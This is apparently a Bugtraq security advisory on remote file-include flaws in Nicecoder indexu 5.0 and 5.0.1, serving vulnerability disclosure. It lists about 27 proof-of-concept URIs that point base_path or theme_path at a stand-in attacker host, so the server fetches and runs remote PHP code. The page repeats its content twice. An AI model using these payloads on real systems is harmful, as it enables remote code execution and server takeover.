Indexu Multiple Remote File Include Vulnerabilities
BID:17470
Info
Indexu Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 17470 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 11 2006 12:00AM |
| Updated: | Apr 12 2006 07:37PM |
| Credit: | SnIpEr_SA is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Nicecoder indexu 5.0.1 Nicecoder indexu 5.0 |
| Not Vulnerable: | |
Discussion
Indexu Multiple Remote File Include Vulnerabilities
The 'indexu' application is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
These issues are reported to affect versions 5.0.0 and 5.0.1; other versions may also be vulnerable.
The 'indexu' application is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
These issues are reported to affect versions 5.0.0 and 5.0.1; other versions may also be vulnerable.
Exploit / POC
Indexu Multiple Remote File Include Vulnerabilities
An exploit is not required.
The following proof-of-concept URIs are available:
http://www.example.com/indexu/invoice.php?base_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/index.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/become_editor.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/add.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/bad_link.php?theme_path=http://evil.txt
http://www.example.com/indexu/browse.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/detail.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/fav.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/get_rated.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/login.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/mailing_list.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/new.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/modify.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/pick.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/power_search.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/rating.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/rating.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/register.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/review.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/rss.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/search.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/send_pwd.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/sendmail.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/tell_friend.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/top_rated.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/user_detail.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/user_search.php?theme_path=http://evil.txt?cmd?cmd
An exploit is not required.
The following proof-of-concept URIs are available:
http://www.example.com/indexu/invoice.php?base_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/index.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/become_editor.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/add.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/bad_link.php?theme_path=http://evil.txt
http://www.example.com/indexu/browse.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/detail.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/fav.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/get_rated.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/login.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/mailing_list.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/new.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/modify.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/pick.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/power_search.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/rating.php?theme_path=http://evil.txt?cmd
http://www.example.com/indexu/rating.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/register.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/review.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/rss.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/search.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/send_pwd.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/sendmail.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/tell_friend.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/top_rated.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/user_detail.php?theme_path=http://evil.txt?cmd?cmd
http://www.example.com/indexu/user_search.php?theme_path=http://evil.txt?cmd?cmd
Solution / Fix
Indexu Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected]
References
Indexu Multiple Remote File Include Vulnerabilities
References:
References: